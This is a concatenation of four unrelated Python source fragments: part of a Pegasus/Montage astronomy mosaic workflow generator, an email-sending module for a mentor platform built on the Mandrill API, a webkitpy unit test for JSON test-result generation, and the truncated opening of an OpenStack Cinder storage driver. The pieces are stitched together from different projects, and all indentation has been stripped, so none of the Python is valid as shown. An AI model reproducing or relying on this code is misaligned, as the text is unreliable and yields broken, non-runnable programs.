replica_catalog["region.hdr"] = {"url": "file://" + os.getcwd() + "/data/region.hdr", "site_label": "local"}
# we also need an oversized region which will be used in the first part of the
# workflow to get the background correction correct
f = open("data/region-oversized.hdr", "w")
f.write("SIMPLE = T\n")
f.write("BITPIX = -64\n")
f.write("NAXIS = 2\n")
f.write("NAXIS1 = %d\n" %(naxis + 3000))
f.write("NAXIS2 = %d\n" %(naxis + 3000))
f.write("CTYPE1 = 'RA---TAN'\n")
f.write("CTYPE2 = 'DEC--TAN'\n")
f.write("CRVAL1 = %.6f\n" %(crval1))
f.write("CRVAL2 = %.6f\n" %(crval2))
f.write("CRPIX1 = %.6f\n" %(crpix + 1500))
f.write("CRPIX2 = %.6f\n" %(crpix + 1500))
f.write("CDELT1 = %.9f\n" %(-cdelt))
f.write("CDELT2 = %.9f\n" %(cdelt))
f.write("CROTA2 = %.6f\n" %(0.0))
f.write("EQUINOX = %d\n" %(2000))
f.write("END\n")
f.close()
common_files["region-oversized.hdr"] = File("region-oversized.hdr")
replica_catalog["region-oversized.hdr"] = \
{"url": "file://" + os.getcwd() + "/data/region-oversized.hdr", "site_label": "local"}
def add_band(dax, band_id, center, degrees, survey, band, color):
global replica_catalog
band_id = str(band_id)
print("\nAdding band %s (%s %s -> %s)" %(band_id, survey, band, color))
# data find - go a little bit outside the box - see mExec implentation
degrees_datafind = str(float(degrees) * 1.42)
cmd = "mArchiveList %s %s \"%s\" %s %s data/%s-images.tbl" \
%(survey, band, center, degrees_datafind, degrees_datafind, band_id)
print "Running sub command: " + cmd
if subprocess.call(cmd, shell=True) != 0:
print "Command failed!"
sys.exit(1)
replica_catalog["%s-images.tbl" %(band_id)] = \
{"url": "file://" + os.getcwd() + "/data/%s-images.tbl" %(band_id), \
"site_label": "local"}
# image tables
raw_tbl = File("%s-raw.tbl" %(band_id))
replica_catalog[raw_tbl.name] = \
{"url": "file://" + os.getcwd() + "/data/" + raw_tbl.name, "site_label": "local"}
projected_tbl = File("%s-projected.tbl" %(band_id))
replica_catalog[projected_tbl.name] = \
{"url": "file://" + os.getcwd() + "/data/" + projected_tbl.name, "site_label": "local"}
corrected_tbl = File("%s-corrected.tbl" %(band_id))
replica_catalog[corrected_tbl.name] = \
{"url": "file://" + os.getcwd() + "/data/" + corrected_tbl.name, "site_label": "local"}
cmd = "cd data && mDAGTbls %s-images.tbl region-oversized.hdr %s %s %s" \
%(band_id, raw_tbl.name, projected_tbl.name, corrected_tbl.name)
print "Running sub command: " + cmd
if subprocess.call(cmd, shell=True) != 0:
print "Command failed!"
sys.exit(1)
# diff table
cmd = "cd data && mOverlaps %s-raw.tbl %s-diffs.tbl" \
%(band_id, band_id)
print "Running sub command: " + cmd
if subprocess.call(cmd, shell=True) != 0:
print "Command failed!"
sys.exit(1)
# statfile table
t = ascii.read("data/%s-diffs.tbl" %(band_id))
# make sure we have a wide enough column
t['stat'] = " "
for row in t:
base_name = re.sub("(diff\.|\.fits.*)", "", row['diff'])
row['stat'] = "%s-fit.%s.txt" %(band_id, base_name)
ascii.write(t, "data/%s-stat.tbl" %(band_id), format='ipac')
replica_catalog["%s-stat.tbl" %(band_id)] = \
{"url": "file://" + os.getcwd() + "/data/%s-stat.tbl" %(band_id), \
"site_label": "local"}
# for all the input images in this band, and them to the rc, and
# add reproject tasks
data = ascii.read("data/%s-images.tbl" %(band_id))
for row in data:
base_name = re.sub("\.fits.*", "", row['file'])
# add an entry to the replica catalog
replica_catalog[base_name + ".fits"] = {"url": row['URL'], "site_label": "ipac"}
# projection job
j = Job(name="mProject")
in_fits = File(base_name + ".fits")
projected_fits = File("p" + base_name + ".fits")
area_fits = File("p" + base_name + "_area.fits")
j.uses(common_files["region-oversized.hdr"], link=Link.INPUT)
j.uses(in_fits, link=Link.INPUT)
j.uses(projected_fits, link=Link.OUTPUT, transfer=False)
j.uses(area_fits, link=Link.OUTPUT, transfer=False)
j.addArguments("-X", in_fits, projected_fits, common_files["region-oversized.hdr"])
dax.addJob(j)
fit_txts = []
data = ascii.read("data/%s-diffs.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['diff'])
# mDiffFit job
j = Job(name="mDiffFit")
plus = File("p" + row['plus'])
plus_area = File(re.sub("\.fits", "_area.fits", plus.name))
minus = File("p" + row['minus'])
minus_area = File(re.sub("\.fits", "_area.fits", minus.name))
fit_txt = File("%s-fit.%s.txt" %(band_id, base_name))
diff_fits = File("%s-diff.%s.fits" %(band_id, base_name))
j.uses(plus, link=Link.INPUT)
j.uses(plus_area, link=Link.INPUT)
j.uses(minus, link=Link.INPUT)
j.uses(minus_area, link=Link.INPUT)
j.uses(common_files["region-oversized.hdr"], link=Link.INPUT)
j.uses(fit_txt, link=Link.OUTPUT, transfer=False)
#j.uses(diff_fits, link=Link.OUTPUT, transfer=True)
j.addArguments("-d", "-s", fit_txt, plus, minus, diff_fits, common_files["region-oversized.hdr"])
dax.addJob(j)
fit_txts.append(fit_txt)
# mConcatFit
j = Job(name="mConcatFit")
stat_tbl = File("%s-stat.tbl" %(band_id))
j.uses(stat_tbl, link=Link.INPUT)
j.addArguments(stat_tbl)
fits_tbl = File("%s-fits.tbl" %(band_id))
j.uses(fits_tbl, link=Link.OUTPUT, transfer=False)
j.addArguments(fits_tbl)
for fit_txt in fit_txts:
j.uses(fit_txt, link=Link.INPUT)
j.addArguments(".")
dax.addJob(j)
# mBgModel
j = Job(name="mBgModel")
j.addArguments("-i", "100000")
images_tbl = File("%s-images.tbl" %(band_id))
j.uses(images_tbl, link=Link.INPUT)
j.addArguments(images_tbl)
j.uses(fits_tbl, link=Link.INPUT)
j.addArguments(fits_tbl)
corrections_tbl = File("%s-corrections.tbl" %(band_id))
j.uses(corrections_tbl, link=Link.OUTPUT, transfer=False)
j.addArguments(corrections_tbl)
dax.addJob(j)
# mBackground
data = ascii.read("data/%s-raw.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['file'])
# mBackground job
j = Job(name="mBackground")
projected_fits = File("p" + base_name + ".fits")
projected_area = File("p" + base_name + "_area.fits")
corrected_fits = File("c" + base_name + ".fits")
corrected_area = File("c" + base_name + "_area.fits")
j.uses(projected_fits, link=Link.INPUT)
j.uses(projected_area, link=Link.INPUT)
j.uses(projected_tbl, link=Link.INPUT)
j.uses(corrections_tbl, link=Link.INPUT)
j.uses(corrected_fits, link=Link.OUTPUT, transfer=False)
j.uses(corrected_area, link=Link.OUTPUT, transfer=False)
j.addArguments("-t", projected_fits, corrected_fits, projected_tbl, corrections_tbl)
dax.addJob(j)
# mImgtbl - we need an updated corrected images table because the pixel offsets and sizes need
# to be exactly right and the original is only an approximation
j = Job(name="mImgtbl")
updated_corrected_tbl = File("%s-updated-corrected.tbl" %(band_id))
j.uses(corrected_tbl, link=Link.INPUT)
j.uses(updated_corrected_tbl, link=Link.OUTPUT, transfer=False)
j.addArguments(".", "-t", corrected_tbl, updated_corrected_tbl)
data = ascii.read("data/%s-corrected.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['file'])
projected_fits = File(base_name + ".fits")
j.uses(projected_fits, link=Link.INPUT)
dax.addJob(j)
# mAdd
j = Job(name="mAdd")
mosaic_fits = File("%s-mosaic.fits" %(band_id))
mosaic_area = File("%s-mosaic_area.fits" %(band_id))
j.uses(updated_corrected_tbl, link=Link.INPUT)
j.uses(common_files["region.hdr"], link=Link.INPUT)
j.uses(mosaic_fits, link=Link.OUTPUT, transfer=True)
j.uses(mosaic_area, link=Link.OUTPUT, transfer=True)
j.addArguments("-e", updated_corrected_tbl, common_files["region.hdr"], mosaic_fits)
data = ascii.read("data/%s-corrected.tbl" %(band_id))
for row in data:
base_name = re.sub("(diff\.|\.fits.*)", "", row['file'])
corrected_fits = File(base_name + ".fits")
corrected_area = File(base_name + "_area.fits")
j.uses(corrected_fits, link=Link.INPUT)
j.uses(corrected_area, link=Link.INPUT)
dax.addJob(j)
# mViewer - Make the JPEG for this channel
j = Job(name="mViewer")
mosaic_jpg = File("%s-mosaic.jpg" %(band_id))
j.uses(mosaic_fits, link=Link.INPUT)
j.uses(mosaic_jpg, link=Link.OUTPUT, transfer=True)
j.addArguments("-ct", "0", "-gray", mosaic_fits, "0s", "99.999%", "gaussian", \
"-out", mosaic_jpg)
dax.addJob(j)
def color_jpg(dax, red_id, green_id, blue_id):
global replica_catalog
red_id = str(red_id)
green_id = str(green_id)
blue_id = str(blue_id)
# mViewer - Make the JPEG for this channel
j = Job(name="mViewer")
mosaic_jpg = File("mosaic-color.jpg")
red_fits = File("%s-mosaic.fits" %(red_id))
green_fits = File("%s-mosaic.fits" %(green_id))
blue_fits = File("%s-mosaic.fits" %(blue_id))
j.uses(red_fits, link=Link.INPUT)
j.uses(green_fits, link=Link.INPUT)
j.uses(blue_fits, link=Link.INPUT)
j.uses(mosaic_jpg, link=Link.OUTPUT, transfer=True)
j.addArguments( \
"-red", red_fits, "-1s", "99.999%", "gaussian-log", \
"-green", green_fits, "-1s", "99.999%", "gaussian-log", \
"-blue", blue_fits, "-1s", "99.999%", "gaussian-log", \
"-out", mosaic_jpg)
dax.addJob(j)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--work-dir", action = "store", dest = "work_dir",
help = "Work directory to chdir to")
parser.add_argument("--center", action = "store", dest = "center",
help = "Center of the output, for example M17 or 56.5 23.75")
parser.add_argument("--degrees", action = "store", dest = "degrees",
help = "Number of degrees of side of the output")
parser.add_argument("--band", action = "append", dest = "bands",
help = "Band definition. Example: dss:DSS2B:red")
parser.add_argument("--tc-target", action = "store", dest = "tc_target",
help = "Transformation catalog: regular or container")
args = parser.parse_args()
if args.work_dir:
os.chdir(args.work_dir)
if args.tc_target is None:
args.tc_target = "regular"
if os.path.exists("data"):
print("data/ directory already exists")
sys.exit(1)
os.mkdir("data")
dax = AutoADAG("montage")
# email notificiations for when the state of the workflow changes
share_dir = subprocess.Popen("pegasus-config --sh-dump | grep ^PEGASUS_SHARE_DIR= | sed -e 's/.*=//' -e 's/\"//g'",
shell=True,
stdout=subprocess.PIPE).communicate()[0]
share_dir = share_dir.strip()
dax.invoke('start', share_dir + "/notification/email")
dax.invoke('on_error', share_dir + "/notification/email")
dax.invoke('on_success', share_dir + "/notification/email --report=pegasus-statistics")
build_transformation_catalog(args.tc_target, dax)
# region.hdr is the template for the ouput area
generate_region_hdr(dax, args.center, args.degrees)
band_id = 0
color_band = {}
for band_def in args.bands:
band_id += 1
(survey, band, color) = band_def.split(":")
add_band(dax, band_id, args.center, args.degrees, survey, band, color)
color_band[color] = band_id
# if we have 3 bands in red, blue, green, try to create a color jpeg
if 'red' in color_band and 'green' in color_band and 'blue' in color_band:
color_jpg(dax, color_band['red'], color_band['green'], color_band['blue'])
# write out the replica catalog
fd = open("data/rc.txt", "w")
for lfn, data in replica_catalog.iteritems():
fd.write("%s \"%s\" pool=\"%s\"\n" %(lfn, data['url'], data['site_label']))
fd.close()
fd = open("data/montage.dax", "w")
dax.writeXML(fd)
fd.close()
if __name__ == "__main__":
main()
|
|
from models import User, Message, Contribution, Program
from time import gmtime, strftime
import mandrill
import exceptions
import access
import mailContent
KEY = access.mandrill_key
#sending an outbound mail. From entrepreneur to mentor or job applicant
def outBoundMail(message):
from_email = message.get("sender_email")
from_name = message.get("sender_name")
to_email = message.get("receiver_email")
to_name = message.get("receiver_name")
subject = message.get("subject")
html = message.get("content")
reply_to = message.get("reply_to")
tags = "Outbound Mail"
merge = False
variables = None
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge):
try:
mandrill_client = mandrill.Mandrill(KEY)
message = {'auto_html': True,
'auto_text': True,
'from_email': from_email,
'from_name': from_name,
'global_merge_vars': [{'content': 'merge1 content', 'name': 'merge1'}],
'headers': {'Reply-To': reply_to},
'html': html,
'important': True,
'inline_css': True,
'merge': merge,
'merge_vars': [{'rcpt': to_email, 'vars': variables}],
'metadata': {'website': 'www.mestmentorplatform.appspot.com'},
'preserve_recipients': None,
'recipient_metadata': [{'rcpt': to_email,
'values': {'rcpt_name': to_name}
}],
'signing_domain': None,
'subject': subject,
'tags': [tags],
'text': html,
'to': [{'email': to_email}],
'track_clicks': True,
'track_opens': True,
'tracking_domain': None,
'url_strip_qs': None}
result = mandrill_client.messages.send(message=message, async=False, ip_pool='Main Pool')
print result[0].get("_id")
return result
except mandrill.Error, e:
return 'A mandrill error occurred: %s - %s' % (e.__class__, e)
#outbound mail ends here
def getAdminDetails():
recipient = {}
recipient['name'] = "Administration"
recipient['email'] = "nnutsukpui@gmail.com"
# recipient['alias'] = "<no-reply>@mestmentorplatform.appspotmail.com"
# <incubator.mgmt@meltwater.org>
# recipient['name'] = "Anirudh Narla"
# recipient['email'] = "anirudh@meltwater.org"
recipient['alias'] = "admin@mestmentorplatform.appspotmail.com"
return recipient
user_role = {"Entrepreneur": "an Entrepreneur", "Mentor": "a Mentor", "Job Applicant": "a Freelancer"}
def requestMail(user):
new_user_name = user.first_name + " " + user.last_name
new_user_role = user_role.get(user.user_profile)
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
recipient = getAdminDetails();
to_email = recipient.get("email")
to_name = recipient.get("name")
subject = "Request For Confirmation"
html = mailContent.request
reply_to = recipient.get("alias")
tags = "Request For Confirmation"
confirmation_url = access.admin_url
variables = [{'name': 'username', 'content': new_user_name},
{'name': 'role', 'content': new_user_role },
{'name':'confirmation_url', 'content': confirmation_url}]
print sendRequestMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables)
def sendRequestMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables):
try:
mandrill_client = mandrill.Mandrill(KEY)
message = {'auto_html': True,
'auto_text': True,
'from_email': from_email,
'from_name': from_name,
'global_merge_vars': [{'content': 'merge1 content', 'name': 'merge1'}],
'headers': {'Reply-To': reply_to},
'html': html,
'important': True,
'inline_css': True,
'merge': True,
'merge_vars': [{'rcpt': to_email, 'vars': variables}],
'metadata': {'website': 'www.mestmentorplatform.appspot.com'},
'preserve_recipients': None,
'recipient_metadata': [{'rcpt': to_email,
'values': {'user_id': 123456}}],
'signing_domain': None,
'subject': subject,
'tags': [tags],
'text': "text",
'to': [{'email': to_email}],
'track_clicks': True,
'track_opens': True,
'tracking_domain': None,
'url_strip_qs': None}
result = mandrill_client.messages.send(message=message, async=False, ip_pool='Main Pool')
return result
except mandrill.Error, e:
return 'A mandrill error occurred: %s - %s' % (e.__class__, e)
def composeNewMail(message):
user = message.get('sender')
notify = message.get('notification_email')
result = False
try:
result = outBoundMail(message)
except:
return False
if result != False:
try:
msg = Message.create(message)
user.notify_mail = notify
user.put()
# print user.notify_mail
return result
except:
return False
else:
return False
def notifyEntrepreneur(message):
user = message.get("receiver")
from_email = message.get("sender_email")
from_name = message.get("sender_name")
to_email = user.notify_mail
to_name = message.get("sender_name")
subject = "You just received a mail on the MEST Mentor Platform."
html = mailContent.notification_received
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "Outbound Mail"
confirmation_url = access.message_url
variables = [ {'name': 'username', 'content': message.get("receiver").first_name + " " +message.get("receiver").last_name},
{'name': 'sender_name', 'content': message.get("sender").first_name + " " +message.get("sender").last_name},
{'name': 'role', 'content' : message.get("sender").user_profile },
{'name':'read_url', 'content': confirmation_url}]
merge = False
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def confirmUserMail(user):
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
to_email = user.notify_mail
to_name = user.first_name + " " + user.last_name
subject = "Welcome to the MEST Mentor Platform!"
confirmation_url = access.signin_url
if user.user_profile == "Mentor":
html = mailContent.confirm_user_mentor
variables = [{ 'name': 'username', 'content': to_name},
{'name': 'server_url', 'content': access.server_url},
{'name': 'signin_url', 'content': confirmation_url},
{'name': 'confirmation_url', 'content': confirmation_url}]
elif user.user_profile == "Entrepreneur":
html = mailContent.confirm_user
variables = [{ 'name': 'username', 'content': to_name},
{'name': 'signin_url', 'content': confirmation_url},
{'name': 'confirmation_url', 'content': confirmation_url}]
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "Confirmed User"
merge = False
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def notificationMail(user):
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
to_email = user.notify_mail
to_name = user.first_name + " " + user.last_name
user_profile = ""
if user.user_profile == "Mentor":
user_profile = "a Mentor"
else:
user_profile = "an Entrepreneur"
subject = "We've Received Your %s Application" %(user.user_profile)
html = mailContent.signup_template
variables = [{ 'name': 'username', 'content': to_name},
{'name': 'userprofile', 'content': user_profile}]
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "Confirmed User"
merge = False
return sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
def sendContributionMails(contribution, mentor):
result = sendContributionMailAdmin(contribution, mentor)
def sendContributionMailAdmin(contribution, mentor):
admin = User.all().filter("user_profile =", "Administrator").get()
from_email = "admin@mestmentorplatform.appspotmail.com"
from_name = "MEST Mentor Platform"
to_email = "admin@mestmentorplatform.appspotmail.com"
to_name = admin.first_name + " " + admin.last_name
mentor_name = mentor.first_name + " " + mentor.last_name
subject = "%s has submitted hours for assisting %s" %(mentor_name, contribution.get("company",""))
html = mailContent.newhour
variables = [
{'name':'contributors_full_name', 'content': mentor_name},
{'name':'contributed_hours', 'content': contribution.get("hours","")},
{'name':'company_name', 'content': contribution.get("company","")},
{'name':'contributors_first_name', 'content': mentor.first_name},
{'name':'description', 'content': contribution.get("description","")}
]
reply_to = "admin@mestmentorplatform.appspotmail.com"
tags = "New hour contributed"
merge = False
ceo = getContributionCEO(contribution)
try:
# first = sendOutboundMail(from_email, from_name, to_email, to_name, subject, html, tags, reply_to, variables, merge)
second = sendOutboundMail(from_email, from_name, admin.email, to_name, subject, html, tags, reply_to, variables, merge)
third = sendOutboundMail(from_email, from_name, ceo.get("to_email"), ceo.get("to_name"), subject, html, tags, reply_to, variables, merge)
fourth = sendBadgeMail(from_email, from_name, contribution, mentor, admin, reply_to, merge, to_name)
return True
except:
return False
def getContributionCEO(contribution):
ceo = {}
ceo['to_email'] = "nnutsukpui@gmail.com"
ceo['to_name'] = "Nicodemus Nutsukpui"
return ceo
def sendBadgeMail(from_email, from_name, contribution, mentor, admin, reply_to, merge, to_name):
sendmail = False
contributed_hours = contribution.get("new_total")
badge_category = ""
badge_name = ""
contributors_first_name = mentor.first_name
program = Program.all().filter("user = ", mentor).get()
to_name_mentor = mentor.first_name + " " + mentor.last_name
subject = "%s just earned a new badge!" %(to_name_mentor)
tags = "New badge earned"
if contributed_hours >= 50 and program.guru == None:
sendmail = True
badge_category = "GURU"
badge_name = "Badge50"
program.guru = True
program.ninja = True
program.rock_star = True
program.put()
elif contributed_hours >= 25 and program.ninja == None:
sendmail = True
badge_name = "Badge25"
badge_category = "NINJA"
program.ninja = True
program.rock_star = True
program.put()
elif contributed_hours >= 10 and program.rock_star == None:
sendmail = True
badge_name = "Badge10"
badge_category = "ROCK STAR"
program.rock_star = True
program.put()
to_email_mentor = mentor.email
html_mentor = mailContent.newbadge
variables_mentor = [
{'name':'contributors_first_name', 'content': contributors_first_name},
{'name':'contributed_hours', 'content': contributed_hours},
{'name':'badge_name', 'content': badge_name},
{'name':'badge_category', 'content': badge_category}
]
to_email_admin = admin.email
to_name_admin = to_name
html_admin = mailContent.newbadgeadmin
variables_admin = [
{'name':'contributors_full_name', 'content': to_name_mentor},
{'name':'badge_category', 'content': badge_category},
{'name':'contributed_hours', 'content': contributed_hours},
{'name':'contributors_first_name', 'content': contributors_first_name}
]
if sendmail:
try:
mentor_mail = sendOutboundMail(from_email, from_name, to_email_mentor, to_name_mentor, subject, html_mentor, tags, reply_to, variables_mentor, merge)
admin_mail = sendOutboundMail(from_email, from_name, to_email_admin, to_name_admin, subject, html_admin, tags, reply_to, variables_admin, merge)
return True
except:
return False
return True
|
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import json
import optparse
import random
from webkitpy.common.host_mock import MockHost
from webkitpy.layout_tests.layout_package import json_results_generator
from webkitpy.layout_tests.models import test_expectations
from webkitpy.layout_tests.port import test
from webkitpy.thirdparty.mock import Mock
class JSONGeneratorTest(unittest.TestCase):
def setUp(self):
self.builder_name = 'DUMMY_BUILDER_NAME'
self.build_name = 'DUMMY_BUILD_NAME'
self.build_number = 'DUMMY_BUILDER_NUMBER'
# For archived results.
self._json = None
self._num_runs = 0
self._tests_set = set([])
self._test_timings = {}
self._failed_count_map = {}
self._PASS_count = 0
self._DISABLED_count = 0
self._FLAKY_count = 0
self._FAILS_count = 0
self._fixable_count = 0
def test_strip_json_wrapper(self):
json = "['contents']"
self.assertEqual(json_results_generator.strip_json_wrapper(json_results_generator._JSON_PREFIX + json + json_results_generator._JSON_SUFFIX), json)
self.assertEqual(json_results_generator.strip_json_wrapper(json), json)
def _test_json_generation(self, passed_tests_list, failed_tests_list):
tests_set = set(passed_tests_list) | set(failed_tests_list)
DISABLED_tests = set([t for t in tests_set
if t.startswith('DISABLED_')])
FLAKY_tests = set([t for t in tests_set
if t.startswith('FLAKY_')])
FAILS_tests = set([t for t in tests_set
if t.startswith('FAILS_')])
PASS_tests = tests_set - (DISABLED_tests | FLAKY_tests | FAILS_tests)
failed_tests = set(failed_tests_list) - DISABLED_tests
failed_count_map = dict([(t, 1) for t in failed_tests])
test_timings = {}
i = 0
for test in tests_set:
test_timings[test] = float(self._num_runs * 100 + i)
i += 1
test_results_map = dict()
for test in tests_set:
test_results_map[test] = json_results_generator.TestResult(test,
failed=(test in failed_tests),
elapsed_time=test_timings[test])
host = MockHost()
port = Mock()
port._filesystem = host.filesystem
generator = json_results_generator.JSONResultsGeneratorBase(port,
self.builder_name, self.build_name, self.build_number,
'',
None, # don't fetch past json results archive
test_results_map)
failed_count_map = dict([(t, 1) for t in failed_tests])
# Test incremental json results
incremental_json = generator.get_json()
self._verify_json_results(
tests_set,
test_timings,
failed_count_map,
len(PASS_tests),
len(DISABLED_tests),
len(FLAKY_tests),
len(DISABLED_tests | failed_tests),
incremental_json,
1)
# We don't verify the results here, but at least we make sure the code runs without errors.
generator.generate_json_output()
generator.generate_times_ms_file()
def _verify_json_results(self, tests_set, test_timings, failed_count_map,
PASS_count, DISABLED_count, FLAKY_count,
fixable_count,
json, num_runs):
# Aliasing to a short name for better access to its constants.
JRG = json_results_generator.JSONResultsGeneratorBase
self.assertTrue(JRG.VERSION_KEY in json)
self.assertTrue(self.builder_name in json)
buildinfo = json[self.builder_name]
self.assertTrue(JRG.FIXABLE in buildinfo)
self.assertTrue(JRG.TESTS in buildinfo)
self.assertEqual(len(buildinfo[JRG.BUILD_NUMBERS]), num_runs)
self.assertEqual(buildinfo[JRG.BUILD_NUMBERS][0], self.build_number)
if tests_set or DISABLED_count:
fixable = {}
for fixable_items in buildinfo[JRG.FIXABLE]:
for (type, count) in fixable_items.iteritems():
if type in fixable:
fixable[type] = fixable[type] + count
else:
fixable[type] = count
if PASS_count:
self.assertEqual(fixable[JRG.PASS_RESULT], PASS_count)
else:
self.assertTrue(JRG.PASS_RESULT not in fixable or
fixable[JRG.PASS_RESULT] == 0)
if DISABLED_count:
self.assertEqual(fixable[JRG.SKIP_RESULT], DISABLED_count)
else:
self.assertTrue(JRG.SKIP_RESULT not in fixable or
fixable[JRG.SKIP_RESULT] == 0)
if FLAKY_count:
self.assertEqual(fixable[JRG.FLAKY_RESULT], FLAKY_count)
else:
self.assertTrue(JRG.FLAKY_RESULT not in fixable or
fixable[JRG.FLAKY_RESULT] == 0)
if failed_count_map:
tests = buildinfo[JRG.TESTS]
for test_name in failed_count_map.iterkeys():
test = self._find_test_in_trie(test_name, tests)
failed = 0
for result in test[JRG.RESULTS]:
if result[1] == JRG.FAIL_RESULT:
failed += result[0]
self.assertEqual(failed_count_map[test_name], failed)
timing_count = 0
for timings in test[JRG.TIMES]:
if timings[1] == test_timings[test_name]:
timing_count = timings[0]
self.assertEqual(1, timing_count)
if fixable_count:
self.assertEqual(sum(buildinfo[JRG.FIXABLE_COUNT]), fixable_count)
def _find_test_in_trie(self, path, trie):
nodes = path.split("/")
sub_trie = trie
for node in nodes:
self.assertTrue(node in sub_trie)
sub_trie = sub_trie[node]
return sub_trie
def test_json_generation(self):
self._test_json_generation([], [])
self._test_json_generation(['A1', 'B1'], [])
self._test_json_generation([], ['FAILS_A2', 'FAILS_B2'])
self._test_json_generation(['DISABLED_A3', 'DISABLED_B3'], [])
self._test_json_generation(['A4'], ['B4', 'FAILS_C4'])
self._test_json_generation(['DISABLED_C5', 'DISABLED_D5'], ['A5', 'B5'])
self._test_json_generation(
['A6', 'B6', 'FAILS_C6', 'DISABLED_E6', 'DISABLED_F6'],
['FAILS_D6'])
# Generate JSON with the same test sets. (Both incremental results and
# archived results must be updated appropriately.)
self._test_json_generation(
['A', 'FLAKY_B', 'DISABLED_C'],
['FAILS_D', 'FLAKY_E'])
self._test_json_generation(
['A', 'DISABLED_C', 'FLAKY_E'],
['FLAKY_B', 'FAILS_D'])
self._test_json_generation(
['FLAKY_B', 'DISABLED_C', 'FAILS_D'],
['A', 'FLAKY_E'])
def test_hierarchical_json_generation(self):
# FIXME: Re-work tests to be more comprehensible and comprehensive.
self._test_json_generation(['foo/A'], ['foo/B', 'bar/C'])
def test_test_timings_trie(self):
test_port = test.TestPort(MockHost())
individual_test_timings = []
individual_test_timings.append(json_results_generator.TestResult('foo/bar/baz.html', elapsed_time=1.2))
individual_test_timings.append(json_results_generator.TestResult('bar.html', elapsed_time=0.0001))
trie = json_results_generator.test_timings_trie(test_port, individual_test_timings)
expected_trie = {
'bar.html': 0,
'foo': {
'bar': {
'baz.html': 1200,
}
}
}
self.assertEqual(json.dumps(trie), json.dumps(expected_trie))
if __name__ == '__main__':
unittest.main()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Driver for RackScale Design."""
from distutils import version
import json
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import units
try:
from rsd_lib import RSDLib
from sushy import exceptions as sushy_exceptions
except ImportError:
# Used for tests, when no rsd-lib is installed
RSDLib = None
sushy_exceptions = None
from cinder import exception
from cinder.i18n import _
from cinder import interface
from cinder import utils
from cinder.volume import driver
from cinder.volume import volume_utils
LOG = logging.getLogger(__name__)
RSD_OPTS = [
cfg.StrOpt('podm_url',
default='',
help='URL of PODM service'),
cfg.StrOpt('podm_username',
default='',
help='Username of PODM service'),
cfg.StrOpt('podm_password',
default='',
help='Password of PODM service',
secret=True),
]
class RSDRetryableException(exception.VolumeDriverException):
message = _("RSD retryable exception: %(reason)s")
def get_volume_metadata(volume):
metadata = volume.get('volume_metadata')
if metadata:
ret = {data['key']: data['value'] for data in metadata}
else:
ret = volume.get('metadata', {})
return ret
class RSDClient(object):
def __init__(self, rsdlib):
self.rsdlib = rsdlib
@classmethod
def initialize(cls, url, username, password, verify):
if not RSDLib:
raise exception.VolumeBackendAPIException(
data=(_("RSDLib is not available, please install rsd-lib.")))
try:
rsdlib = RSDLib(url, username, password, verify=verify).factory()
except Exception:
# error credentials may throw unexpected exception
LOG.exception("Cannot connect to RSD PODM")
raise exception.VolumeBackendAPIException(
data=_("initialize: Cannot connect to RSD PODM."))
rsd_api_version = version.LooseVersion(rsdlib._rsd_api_version)
if rsd_api_version < version.LooseVersion("2.4.0"):
raise exception.VolumeBackendAPIException(
data=(_("initialize: Unsupported rsd_api version: "
"%(current)s < %(expected)s.")
% {'current': rsdlib._rsd_api_version,
'expected': "2.4.0"}))
if rsdlib._redfish_version < version.LooseVersion("1.1.0"):
raise exception.VolumeBackendAPIException(
